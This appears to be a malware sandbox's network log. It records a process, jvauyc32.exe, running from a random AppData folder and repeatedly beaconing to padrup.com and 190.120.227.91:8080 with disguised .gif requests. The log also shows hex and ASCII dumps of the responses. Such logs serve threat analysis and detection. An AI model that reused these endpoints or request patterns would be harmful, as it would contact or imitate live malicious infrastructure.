                                                                                                                                                                                                                                                                                          54192.168.2.950036185.53.178.5080800C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:13.855514050 CEST157OUTGET /sobaka1.gif?27c85804=-957761516 HTTP/1.1
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                                                                                                                                                                                                          Host: padrup.com
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:14.966861010 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Fri, 18 Oct 2024 10:44:14 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                          X-Redirect: skenzo
                                                                                                                                                                                                                                                                                          X-Buckets: bucket102
                                                                                                                                                                                                                                                                                          X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_ZyXj+mRScJ5uIq89i8ZPiyu6PQJwFSu+Tg6sWyFphcGg0SsyLBV28tGQOgijMYXWaGdkO3FwBzECe8PPJ+h5Gg==
                                                                                                                                                                                                                                                                                          X-Template: tpl_CleanPeppermintBlack_twoclick
                                                                                                                                                                                                                                                                                          X-Language: english
                                                                                                                                                                                                                                                                                          Accept-CH: viewport-width
                                                                                                                                                                                                                                                                                          Accept-CH: dpr
                                                                                                                                                                                                                                                                                          Accept-CH: device-memory
                                                                                                                                                                                                                                                                                          Accept-CH: rtt
                                                                                                                                                                                                                                                                                          Accept-CH: downlink
                                                                                                                                                                                                                                                                                          Accept-CH: ect
                                                                                                                                                                                                                                                                                          Accept-CH: ua
                                                                                                                                                                                                                                                                                          Accept-CH: ua-full-version
                                                                                                                                                                                                                                                                                          Accept-CH: ua-platform
                                                                                                                                                                                                                                                                                          Accept-CH: ua-platform-version
                                                                                                                                                                                                                                                                                          Accept-CH: ua-arch
                                                                                                                                                                                                                                                                                          Accept-CH: ua-model
                                                                                                                                                                                                                                                                                          Accept-CH: ua-mobile
                                                                                                                                                                                                                                                                                          Accept-CH-Lifetime: 30
                                                                                                                                                                                                                                                                                          X-Pcrew-Ip-Organization: QuadraNet
                                                                                                                                                                                                                                                                                          X-Pcrew-Blocked-Reason: hosting network
                                                                                                                                                                                                                                                                                          X-Domain: padrup.com
                                                                                                                                                                                                                                                                                          X-Subdomain:
                                                                                                                                                                                                                                                                                          Data Raw: 37 39 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 70 61 64 72 75 70 26 23 34 36 3b 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66
                                                                                                                                                                                                                                                                                          Data Ascii: 793<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>padrup&#46;com</title><meta http-equiv="Content-Type" content="text/html; charset=utf
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:14.967008114 CEST212INData Raw: 2d 38 22 2f 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 6c 61 6e 67 75 61 67 65 3d 27 4a 61 76 61 53 63 72 69 70 74 27 3e 0a 76 61 72 20 64 6f 6d 61 69 6e 20 3d 20 27 70 61 64 72 75 70
                                                                                                                                                                                                                                                                                          Data Ascii: -8"/><script type='text/javascript' language='JavaScript'>var domain = 'padrup.com';var uniqueTrackingID = 'MTcyOTI0ODI1NC42MTI6YjdlMDZlYjdjOTQyOGRjMjg3ZWQyNWFjYWJjZTc4YzgxYzRhNDk5Y2QyODI0Y2JiMGNkZTgyYzk5MzE
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:14.967020988 CEST1236INData Raw: 35 59 54 51 33 4e 6a 6f 32 4e 7a 45 79 4d 32 4a 6d 5a 54 6b 31 4e 6a 64 6c 27 3b 0a 76 61 72 20 63 6c 69 63 6b 54 72 61 63 6b 69 6e 67 20 3d 20 66 61 6c 73 65 3b 0a 76 61 72 20 74 68 65 6d 65 64 61 74 61 20 3d 20 27 27 3b 0a 76 61 72 20 78 6b 77
                                                                                                                                                                                                                                                                                          Data Ascii: 5YTQ3Njo2NzEyM2JmZTk1Njdl';var clickTracking = false;var themedata = '';var xkw = '';var xsearch = '';var xpcat = '';var bucket = '';var clientID = '';var clientIDs = '';var num_ads = 0;var adtest = 'off';var scriptPath = '';</sc
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:14.967031002 CEST548INData Raw: 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 7d 0a 20 20 20 20 0a 20 20 20 20 78 68 72 2e 6f 70 65 6e 28 27 47 45 54 27 2c 20 70 61 74 68 20 2b 20 27 2f 6c 73 2e 70 27 20 2b 20 27 68 70 3f 74 3d 36 37 31 32 33 62 66 65
                                                                                                                                                                                                                                                                                          Data Ascii: } } } xhr.open('GET', path + '/ls.p' + 'hp?t=67123bfe&token=' + encodeURI(token), true); xhr.send();};ls(new XMLHttpRequest(), scriptPath, '1123f5c88f30eedf0e7d793f8af791029582f142a33');</script><scrip


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          55192.168.2.950037190.120.227.918080800C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:15.369182110 CEST171OUTGET /sobakavolos.gif?27fe3552=-1611082424 HTTP/1.1
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                                                                                                                                                                                                          Host: 190.120.227.91:8080
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          56192.168.2.950038185.53.178.5080800C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:19.940457106 CEST156OUTGET /sobaka1.gif?28892810=465574000 HTTP/1.1
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                                                                                                                                                                                                          Host: padrup.com
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:20.972254992 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Fri, 18 Oct 2024 10:44:20 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                          X-Redirect: skenzo
                                                                                                                                                                                                                                                                                          X-Buckets: bucket102
                                                                                                                                                                                                                                                                                          X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_nqFkTrQDZvYjtnrfUZoQQ8hwLloaHsfX9P9Qksww94r7ZXiygU5z8+LZrRiE8mUadu1wdSGP0zYPs/BHoVYyyQ==
                                                                                                                                                                                                                                                                                          X-Template: tpl_CleanPeppermintBlack_twoclick
                                                                                                                                                                                                                                                                                          X-Language: english
                                                                                                                                                                                                                                                                                          Accept-CH: viewport-width
                                                                                                                                                                                                                                                                                          Accept-CH: dpr
                                                                                                                                                                                                                                                                                          Accept-CH: device-memory
                                                                                                                                                                                                                                                                                          Accept-CH: rtt
                                                                                                                                                                                                                                                                                          Accept-CH: downlink
                                                                                                                                                                                                                                                                                          Accept-CH: ect
                                                                                                                                                                                                                                                                                          Accept-CH: ua
                                                                                                                                                                                                                                                                                          Accept-CH: ua-full-version
                                                                                                                                                                                                                                                                                          Accept-CH: ua-platform
                                                                                                                                                                                                                                                                                          Accept-CH: ua-platform-version
                                                                                                                                                                                                                                                                                          Accept-CH: ua-arch
                                                                                                                                                                                                                                                                                          Accept-CH: ua-model
                                                                                                                                                                                                                                                                                          Accept-CH: ua-mobile
                                                                                                                                                                                                                                                                                          Accept-CH-Lifetime: 30
                                                                                                                                                                                                                                                                                          X-Pcrew-Ip-Organization: QuadraNet
                                                                                                                                                                                                                                                                                          X-Pcrew-Blocked-Reason: hosting network
                                                                                                                                                                                                                                                                                          X-Domain: padrup.com
                                                                                                                                                                                                                                                                                          X-Subdomain:
                                                                                                                                                                                                                                                                                          Data Raw: 37 39 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 70 61 64 72 75 70 26 23 34 36 3b 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66
                                                                                                                                                                                                                                                                                          Data Ascii: 793<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>padrup&#46;com</title><meta http-equiv="Content-Type" content="text/html; charset=utf
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:20.972274065 CEST1236INData Raw: 2d 38 22 2f 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 6c 61 6e 67 75 61 67 65 3d 27 4a 61 76 61 53 63 72 69 70 74 27 3e 0a 76 61 72 20 64 6f 6d 61 69 6e 20 3d 20 27 70 61 64 72 75 70
                                                                                                                                                                                                                                                                                          Data Ascii: -8"/><script type='text/javascript' language='JavaScript'>var domain = 'padrup.com';var uniqueTrackingID = 'MTcyOTI0ODI2MC42MzI2OmU1ZTBkZWExYTllOWIwMmZlODA2MDQ5NTM2MzM0ZGEwM2FjYWRlZWQ3NTczMTMzMWIwZDUxOTA3NWU0MTg1NWY6NjcxMjNjMDQ5YTcwMw==';
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:20.972285986 CEST424INData Raw: 3d 20 27 27 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6e 73 6f 6c 65
                                                                                                                                                                                                                                                                                          Data Ascii: = '') { return; } console.log(JSON.parse(xhr.responseText)) } else { console.log('There was a problem with the request.'); } } }
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:20.972296953 CEST336INData Raw: 0d 0a 31 34 32 0d 0a 61 64 61 27 29 3b 3c 2f 73 63 72 69 70 74 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 6c 61 6e 67 75 61 67 65 3d 27 4a 61 76 61 53 63 72 69 70 74 27 3e 0a 77 69 6e
                                                                                                                                                                                                                                                                                          Data Ascii: 142ada');</script><script type='text/javascript' language='JavaScript'>window.onload = function() {if(clickTracking && typeof track_onclick == 'function') track_onclick("6568ca3c198765a2c3c6d04aa2e4186282ac1f83");top.location.href


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          57192.168.2.950039190.120.227.918080800C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:21.738194942 CEST170OUTGET /sobakavolos.gif?28a2e80b=-204378046 HTTP/1.1
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                                                                                                                                                                                                          Host: 190.120.227.91:8080
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          58192.168.2.950040185.53.178.5080800C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:26.182900906 CEST156OUTGET /sobaka1.gif?2924596e=690248046 HTTP/1.1
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                                                                                                                                                                                                          Host: padrup.com
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:27.259763956 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Fri, 18 Oct 2024 10:44:27 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                          X-Redirect: skenzo
                                                                                                                                                                                                                                                                                          X-Buckets: bucket102
                                                                                                                                                                                                                                                                                          X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_aH1pfONJ8RGIHVsnY6q84Y016TSl/+qhN0CyhUgbh6SK/cgBAU24Cs4YRdxZvT4pCRlE9YnhIG1WZvWOJVO7Vg==
                                                                                                                                                                                                                                                                                          X-Template: tpl_CleanPeppermintBlack_twoclick
                                                                                                                                                                                                                                                                                          X-Language: english
                                                                                                                                                                                                                                                                                          Accept-CH: viewport-width
                                                                                                                                                                                                                                                                                          Accept-CH: dpr
                                                                                                                                                                                                                                                                                          Accept-CH: device-memory
                                                                                                                                                                                                                                                                                          Accept-CH: rtt
                                                                                                                                                                                                                                                                                          Accept-CH: downlink
                                                                                                                                                                                                                                                                                          Accept-CH: ect
                                                                                                                                                                                                                                                                                          Accept-CH: ua
                                                                                                                                                                                                                                                                                          Accept-CH: ua-full-version
                                                                                                                                                                                                                                                                                          Accept-CH: ua-platform
                                                                                                                                                                                                                                                                                          Accept-CH: ua-platform-version
                                                                                                                                                                                                                                                                                          Accept-CH: ua-arch
                                                                                                                                                                                                                                                                                          Accept-CH: ua-model
                                                                                                                                                                                                                                                                                          Accept-CH: ua-mobile
                                                                                                                                                                                                                                                                                          Accept-CH-Lifetime: 30
                                                                                                                                                                                                                                                                                          X-Pcrew-Ip-Organization: QuadraNet
                                                                                                                                                                                                                                                                                          X-Pcrew-Blocked-Reason: hosting network
                                                                                                                                                                                                                                                                                          X-Domain: padrup.com
                                                                                                                                                                                                                                                                                          X-Subdomain:
                                                                                                                                                                                                                                                                                          Data Raw: 37 39 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 70 61 64 72 75 70 26 23 34 36 3b 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66
                                                                                                                                                                                                                                                                                          Data Ascii: 793<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>padrup&#46;com</title><meta http-equiv="Content-Type" content="text/html; charset=utf
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:27.259780884 CEST1236INData Raw: 2d 38 22 2f 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 6c 61 6e 67 75 61 67 65 3d 27 4a 61 76 61 53 63 72 69 70 74 27 3e 0a 76 61 72 20 64 6f 6d 61 69 6e 20 3d 20 27 70 61 64 72 75 70
                                                                                                                                                                                                                                                                                          Data Ascii: -8"/><script type='text/javascript' language='JavaScript'>var domain = 'padrup.com';var uniqueTrackingID = 'MTcyOTI0ODI2Ni45MDI0OjgzODdjNDVmODg5ZmY3NGZmZmU4NmIzODBlZjc5OTQzZDczOGUxOGVhZjljYWEwNWE4NWI1ZmQ1Mjg2OWM0OWM6NjcxMjNjMGFkYzUwZQ==';
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:27.259799957 CEST764INData Raw: 29 20 3d 3d 3d 20 27 27 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6e
                                                                                                                                                                                                                                                                                          Data Ascii: ) === '') { return; } console.log(JSON.parse(xhr.responseText)) } else { console.log('There was a problem with the request.'); } } }


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          59192.168.2.950041190.120.227.918080800C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:27.893058062 CEST170OUTGET /sobakavolos.gif?2945db31=1244584328 HTTP/1.1
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                                                                                                                                                                                                          Host: 190.120.227.91:8080
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          60192.168.2.950042185.53.178.5080800C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:32.972449064 CEST156OUTGET /sobaka1.gif?29d43e7c=701775484 HTTP/1.1
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                                                                                                                                                                                                          Host: padrup.com
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:34.003377914 CEST1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                          Server: nginx
                                                                                                                                                                                                                                                                                          Date: Fri, 18 Oct 2024 10:44:33 GMT
                                                                                                                                                                                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                          Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                          Connection: keep-alive
                                                                                                                                                                                                                                                                                          Vary: Accept-Encoding
                                                                                                                                                                                                                                                                                          X-Redirect: skenzo
                                                                                                                                                                                                                                                                                          X-Buckets: bucket102
                                                                                                                                                                                                                                                                                          X-Adblock-Key: MFwwDQYJKoZIhvcNAQEBBQADSwAwSAJBALquDFETXRn0Hr05fUP7EJT77xYnPmRbpMy4vk8KYiHnkNpednjOANJcaXDXcKQJN0nXKZJL7TciJD8AoHXK158CAwEAAQ==_UDw9IwJvkd0L3CwebU9V1NehExUqbvoAx7VvQkKuyxUVJW/dphtGiee69tL8S7RQ24GG/Y7Sxc7XyHluPRTjJA==
                                                                                                                                                                                                                                                                                          X-Template: tpl_CleanPeppermintBlack_twoclick
                                                                                                                                                                                                                                                                                          X-Language: english
                                                                                                                                                                                                                                                                                          Accept-CH: viewport-width
                                                                                                                                                                                                                                                                                          Accept-CH: dpr
                                                                                                                                                                                                                                                                                          Accept-CH: device-memory
                                                                                                                                                                                                                                                                                          Accept-CH: rtt
                                                                                                                                                                                                                                                                                          Accept-CH: downlink
                                                                                                                                                                                                                                                                                          Accept-CH: ect
                                                                                                                                                                                                                                                                                          Accept-CH: ua
                                                                                                                                                                                                                                                                                          Accept-CH: ua-full-version
                                                                                                                                                                                                                                                                                          Accept-CH: ua-platform
                                                                                                                                                                                                                                                                                          Accept-CH: ua-platform-version
                                                                                                                                                                                                                                                                                          Accept-CH: ua-arch
                                                                                                                                                                                                                                                                                          Accept-CH: ua-model
                                                                                                                                                                                                                                                                                          Accept-CH: ua-mobile
                                                                                                                                                                                                                                                                                          Accept-CH-Lifetime: 30
                                                                                                                                                                                                                                                                                          X-Pcrew-Ip-Organization: QuadraNet
                                                                                                                                                                                                                                                                                          X-Pcrew-Blocked-Reason: hosting network
                                                                                                                                                                                                                                                                                          X-Domain: padrup.com
                                                                                                                                                                                                                                                                                          X-Subdomain:
                                                                                                                                                                                                                                                                                          Data Raw: 37 39 33 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 57 33 43 2f 2f 44 54 44 20 58 48 54 4d 4c 20 31 2e 30 20 54 72 61 6e 73 69 74 69 6f 6e 61 6c 2f 2f 45 4e 22 0a 20 20 20 20 20 20 20 20 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 54 52 2f 78 68 74 6d 6c 31 2f 44 54 44 2f 78 68 74 6d 6c 31 2d 74 72 61 6e 73 69 74 69 6f 6e 61 6c 2e 64 74 64 22 3e 0a 3c 68 74 6d 6c 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 31 39 39 39 2f 78 68 74 6d 6c 22 3e 0a 09 3c 68 65 61 64 3e 0a 09 09 3c 74 69 74 6c 65 3e 70 61 64 72 75 70 26 23 34 36 3b 63 6f 6d 3c 2f 74 69 74 6c 65 3e 0a 09 09 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 75 74 66
                                                                                                                                                                                                                                                                                          Data Ascii: 793<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"><html xmlns="http://www.w3.org/1999/xhtml"><head><title>padrup&#46;com</title><meta http-equiv="Content-Type" content="text/html; charset=utf
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:34.003463030 CEST1236INData Raw: 2d 38 22 2f 3e 0a 09 09 3c 73 63 72 69 70 74 20 74 79 70 65 3d 27 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 27 20 6c 61 6e 67 75 61 67 65 3d 27 4a 61 76 61 53 63 72 69 70 74 27 3e 0a 76 61 72 20 64 6f 6d 61 69 6e 20 3d 20 27 70 61 64 72 75 70
                                                                                                                                                                                                                                                                                          Data Ascii: -8"/><script type='text/javascript' language='JavaScript'>var domain = 'padrup.com';var uniqueTrackingID = 'MTcyOTI0ODI3My42NjM4OjYwMDkyN2FiZmRiYzBhNWI4Y2QwYzIyZDE3ZjZhMjQyMjA4YmZmYzE5MmQyZjFiYTM4MDJjNTExOWMxODk0Njk6NjcxMjNjMTFhMjBlNA==';
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:34.003475904 CEST764INData Raw: 29 20 3d 3d 3d 20 27 27 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6e
                                                                                                                                                                                                                                                                                          Data Ascii: ) === '') { return; } console.log(JSON.parse(xhr.responseText)) } else { console.log('There was a problem with the request.'); } } }


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          61192.168.2.950043190.120.227.918080800C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:34.275511980 CEST171OUTGET /sobakavolos.gif?29f3e9f8=-1479563296 HTTP/1.1
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                                                                                                                                                                                                          Host: 190.120.227.91:8080
                                                                                                                                                                                                                                                                                          Cache-Control: no-cache


                                                                                                                                                                                                                                                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                          62192.168.2.950044185.53.178.5080800C:\Users\user\AppData\Roaming\Z0BAZwxx\jvauyc32.exe
                                                                                                                                                                                                                                                                                          TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                          Oct 18, 2024 12:44:39.174968958 CEST156OUTGET /sobaka1.gif?2a6f2852=688527934 HTTP/1.1
                                                                                                                                                                                                                                                                                          User-Agent: Mozilla/4.0 (compatible; MSIE 7.0b; Windows NT 6.0)
                                                                                                                                                                                                                                                                                          Host: padrup.com
